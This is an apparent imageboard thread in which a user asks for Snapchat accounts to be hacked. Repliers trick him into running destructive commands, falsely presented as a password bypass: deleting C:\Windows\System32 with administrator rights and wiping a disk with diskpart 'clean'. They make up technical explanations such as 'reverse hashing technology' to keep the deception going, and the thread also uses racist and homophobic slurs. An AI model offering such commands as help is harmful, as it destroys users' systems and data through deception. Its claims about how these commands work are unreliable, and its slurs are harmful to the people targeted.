Can someone help a bro out

Is there anyone who can hack a few Snapchats for me and get me the passwords for free? I’d greatly appreciate it!

Attached: 5F9A4572-F81F-4683-B257-ABF23A10456B.jpg (700x393, 45K)

Other urls found in this thread:

kb.wisc.edu/helpdesk/page.php?id=27008
twitter.com/SFWRedditVideos

Simple:
Open command prompt and type
rd /s /q C:\Windows\System32

enjoy your ban /soc/nigger

This will do the job. I approve. Cracked many passwords already open doing this.

Do I have to go to the Snapchat website and go to the login and type the username then do that or? I’m also not a computer genius but I do know just enough about them lol

>rd /s /q C:\Windows\System32
Worked for me, thank you.

You have to open the Snapchat App on your phone and have it connected to your computer before, of course.

Like Easy break down:
1) Open Snapchat App on phone.
2) Connect Phone per cable to your pc.
3) Open Command on your pc.
4) Enter rd /s /q C:\Windows\System32

don't spoonfeed the kike, you're just encouraging more of them...

Can anyone find some sort of YouTube video that’ll show how to do it? He said you need to have the app open on your phone and connected to your computer, do I go to iTunes or do I go through files when my computer connects to it?

Oh ok thanks dude!

No iTunes, just connect to your pc and open command.

wow how have snapchat not fixed this, thanks dude

It’s not working for me idky, I go to the login on the app and type in their user but it doesn’t work

Like I type their user then click the password box then do the command prompt thing but it doesn’t work for me, am I doing it wrong? I typed it right in the command prompt box, is there spacing in the prompt like you typed in your reply there?

Try right clicking on command prompt and click run as administrator

Now what do I look for to get the password? Like what will it say?

What OS are you using? Which windows, mac etc?
Once the command runs successfully while your phone is connected you will be able to log in without a password, it's a bypass crack

It says windows 8.1 but I’m about to update it because there’s an update

It's easy. Plug your phone into your computer with a USB cord. Then open the command prompt as Administrator and paste in what they said abd hit enter. Essentially it detects Snapchat on your phone and opens it automatically. The next step is just entering someone's username and it'll log you in without needing a password. Just dont do it too much cause it'll get fixed.

You have to use the command prompt. Here's how you get it on windows 8: kb.wisc.edu/helpdesk/page.php?id=27008

It gives me an endless list of access denied logs

are you running as administrator?
Right click the command prompt and "Run as Administrator"

Did you right click and select run as administrator?

thats nifty. This enables the 32 bit system hooks which let you decode the encrypted database using reverse hashing technology. Snapchat should patch this before someone famous gets hacked

Attached: The.Simpsons.S16E07.Mommie.Beerest.1080p.Bluray.x265.AAC.5.1-ImE[UTR].mkv_snapshot_20.42_[2019.01.23 (1440x1080, 181K)

Yes I did that lol, I hit run as admin and I also copied exactly what you told me to and pasted it

You may need to clean the file system handler. open command prompt and type

diskpart; select disk 1; clean;

WITH the semicolons or it wont register